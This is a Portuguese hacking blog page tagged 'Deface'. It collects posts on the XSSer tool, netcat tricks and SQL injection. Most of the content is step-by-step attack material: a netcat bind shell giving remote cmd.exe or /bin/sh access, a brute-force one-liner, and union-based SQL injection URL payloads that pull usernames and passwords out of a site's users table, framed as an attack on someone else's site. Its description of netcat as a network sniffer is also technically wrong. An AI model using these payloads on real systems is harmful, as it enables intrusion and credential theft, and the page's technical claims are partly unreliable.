Mostrando postagens com marcador Deface. Mostrar todas as postagens
Mostrando postagens com marcador Deface. Mostrar todas as postagens

quinta-feira, 24 de janeiro de 2013

Detectando e exploitando injeções de XSS utilizando o XSSer Tool

O que é XSSer?

XSSer é um programa open-source que automatiza processos de detecção e "explotagem" de injeções XSS em diferentes aplicações.

Você pode testar o software na página vulnerável:

testasp.vulnweb.com/
Como utilizá-lo?

1. root@punter:/pentest/web# $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser

2. root@punter:/pentest/web# cd xsser 
3. root@punter:/pentest/web/xsser# python XSSer.py -u “http://testasp.vulnweb.com” -g “Search.asp?tfSearch=” –proxy “http://127.0.0.1:8118″ –referer “666.666.666.666″ –user-agent “correct audit” –Fuzz -s

4. below are the results








Fonte:
punter-infosec

sexta-feira, 30 de março de 2012

NetCat - O Canivete suiço do TCP/IP


Vamos dar uma olhada nos comandos do netcat, a opção -H exibe as opções do programa. Basta digitar nc -h e dar enter. Veremos os principais comandos do netcat:
l = Coloca uma porta em estado de listenning(escuta)

L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche

P = Define uma porta

V = ativa o recebimento de eco

U = utiliza o protocolo UDP ao invés de TCP

T = para se conectar a TELNET

O = Gera um log em formato hexadecimal

W = Determina um tempo máximo para aguardar uma reposta

E = Redireciona arquivos.

D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.


Bem, agora que já conhecemos os comandos mais usados do netcat vamos a pratica:

Colocando uma porta em escuta:

Nc -l -p 8080 isso faria com que o netcat colocasse a porta 8080 em escuta, note que foi usado -v para que fosse mostrado a saída do programa na tela “listening on [any] 8080 …“, caso a opção -v não fosse inserida este texto não seria mostrado.

Fazendo um Port-Scanner com o netcat:

nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à 6550 mais você também pode selecionar as portas que deseja escanear dando um espaço entre os intervalos de portas a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner nas portas 80, 23, 79 e 25.

Fazendo um trojan com o netcat:

Note que basta redirecionar todo o trafego de uma porta enviando a cmd.exe se for windows e bin/bash.sh se for UNIX a sintaxe é a seguinte em sistemas windows nc -L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.

Fazendo um ataque de brute force com o netcat:

O canivete suíço do TCP/IP tem muitas funções interessante uma delas é o brute force um exemplo: nc -vv 79 < c:\usuarios.txt > c:\log.txt note que você precisara de um arquivos com nome de usuários em c: e todo log será gravado em c:\log.txt para que você possa analisar depois. esse força bruta foi feita em cima da porta 79 FINGER mais poderia ser facilmente adaptada a outras portas.

Fazendo um sniffer com o netcat:
O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma rede basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego na porta 80 acho que nem é mais necessário dizer que podemos também gravar toda saída em um arquivo TXT, mais bem pra você que ainda não sacou a jogada ai vai nc -vv -L 127.0.0.1 -p 80 > c:\sniffer.txt

Autor: Diablos 4-Ever

Fonte: Desconhecida

sexta-feira, 25 de novembro de 2011

Ferramentas hackers


Meu sky-drive com algumas ferramentas hackers,  vale a pena conferir hahaa :D
Clique aqui

Tutorial + Video-Aula: Mysql Injection com Information_schema.


1 – O que é Information_Schema? 

In relational databases, the information schema is an ANSI standard set of read-only views which provide information about all of the tables, views, columns, and procedures in a database. It can be used as a source of the info rmation which some databases make available through non-standard commands, such as the SHOW command of MySQL, the DESCRIBE command of Oracle, and the \d command of PostgreSQL.
Retirado de Wikipédia.
Basicamente foi criado para listar tables,views e colunas, mas quando cai em mãos erradas pode revelar praticamente tudo do seu BD para um black hat.
Maldito Information!!   Não amigo, o information foi criado para o bem, a vulnerabilidade não está nele ou no mysql, está no seu site que faz com que ele possa ser executado remotamente.

2 – Vulnerabilidade: Como ocorre? Como saber? Como resolver? 

A vulnerabilidade se dá por SQL Injection, Aqui no site ja falamos inúmeras vezes como ela ocorre e como resolver, sugiro a você dar uma pesquisada.
Como saber se posso usar information_schema?  Esse recurso está presente no Mysql 5+ para ver isso basta usar na query @@version, exemplo:
www.site.com/index.php?noticia=173+union+all+select+1,@@version ,3 
e for exibido algo como:
5.0.51a-3ubuntu5.8 
Você pode usar information, é claro que pode aparecer outras versões, isso é apenas um exemplo, mas de 5 em diante você pode usar.

3 – Explorando 

A exploração é bem simples, e faremos consultas nessa ordem:
1 – Tabela
2 – Coluna
3 – Dados da Coluna
Achando a Tabela

Digamos que você ja deu Union all select e aparecem no site os numeros 5,6,7. 
Deu a seguinte query:
http://www.site.com/index.php?noticia=173+union+all+select+1,2,3,4,5,6 ,7,8,9,10,11 
Agora fazemos a procura em information_schema.tables:
http://www.site.com/index.php?noticia=173+union+all+select+1,2,3,4,5,6 ,7,8,9,10,11 from information_schema.tables
Substituimos a parte que aparece no site por table_name:
http://www.site.com/index.php?noticia=173+union+all+select+1,2,3,4,tab le_name,6,7,8,9,10,11 from information_schema.tables
O resultado será uma lista de tabelas, ex:
tabela
7
6
tabela2
7
6
tabela3
7
6
usuarios
7
6
 Pronto já temos as tabelas, agora procure alguma que interesse, como ex: usuarios ou admin e iremos limitar a consulta com where table_name=’nome da tabela’ ou então nem limitar e exibir as colunas de cada tabela, como fiz na video-aula.


Limitando:


http://www.site.com/index.php?noticia=173+union+all+select 1,2,3,4,column_name,6,7,8,9,10,11 from information_schema.columns where table_name='usuarios'

Resultado ser algo como:


coluna
7
6
coluna2
7
6
senha
7
6
usuario
7
6
Não limitando:

http://www.site.com/index.php?noticia=173+union+all+select 1,2,3,4,table_name,column_name,7,8,9,10,11 from information_schema.columns
Resultado:
tabela

7
6
tabela2
7
6
tabela3
7
6
usuarios
7
coluna
usuarios
7
coluna2
usuarios
7
senha
usuarios
7
usuario

Pronto agora temos Tabela: usuarios, Colunas: coluna,coluna2,usuario,senha.
Só falta pegar os dados dela:
http://www.site.com/index.php?noticia=173+union+all+select 1,2,3,4,usuario,senha,7,8,9,10,11 from usuarios
Conseguimos !

4 - Vídeo 


(recomendamos você ver em 720p Tela Cheia)


Tutorial de SQL Injection


Nesse tutorial irei ensinar uma falha popularmente conhecida como SQL Injection.
Bom , vamos logo pro assunto.
Primeiro vamos pegar um site , por exemplo:
http://www.site.com/noticias/detalhes.php?id=45
Para sabermos se o site está vulneravel vamos colocar na frente do 45 uma aspa ( ' ) . Como no exemplo abaixo:
http://www.site.com/noticias/detalhes.php?id=45'
Caso retorne algum erro como por exemplo

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''20549'' and loja.codigo = estoque.codigo limit 1' at line 1

Parabéns , o site está vulneravel . Pronto agora vamos ao ataque.

Para descobrirmos quantas tabelas o site tem vamos adicionar a URL o comando ORDER BY e o numero de TABELAS , então você pode user espaço ou + , no caso vou usar + pra poder deixar mais fácil o entendimento.

http://www.site.com/noticias/detalhes.php?id=45+order+by+5
Deu certo ? OK , há cinco tabelas , ai você vai acrescentando sempre +1 , por exemplo tentei ORDER BY 1 ; Order by 2 ; order by 3 ; order by 4 ; order by 5 ; e na hora que coloquei ORDER BY 6 deu erro , é porque nao existe 6 tabelas e sim 5.

Agora vamos pra parte de seleção de colunas :
Vamos usar a syntax  UNION ALL SELECT e adicione um - atras do numero da noticia :
Por exemplo :
http://www.site.com/noticias/detalhes.php?id=-45+union+all+select+1,2,3,4,5 --
Se deu tudo certo quer dizer que está tudo bem até o momento , agora chega a parte mais dificil , achar a tabela do administrador , mais se tudo ocorrer OK , e for tabelas padrões é mais facil hahahaa :D
Segue o exemplo abaixo :

http://www.site.com/noticias/detalhes.php?id=-45+union+all+select+1,2,3,4,5+from+usuarios --
Se tudo ocorrer OK , vai aparecer a pagina e uns números, é nesses números que você vai editar, por exemplo tem o numero 2 e 4 Grande na noticia , substituindo a noticia.
Já que a tabela dos usuários já está selecionado , agora resta selecionar os dados . Por exemplo

http://www.site.com/noticias/detalhes.php?id=-45+union+all+select+1,Login,3,Senha,5+from+usuarios --
 Gostou do tutorial ? Comente :)
Tutorial feito por mim mesmo Waldemar Silva.
Duvidas ? :)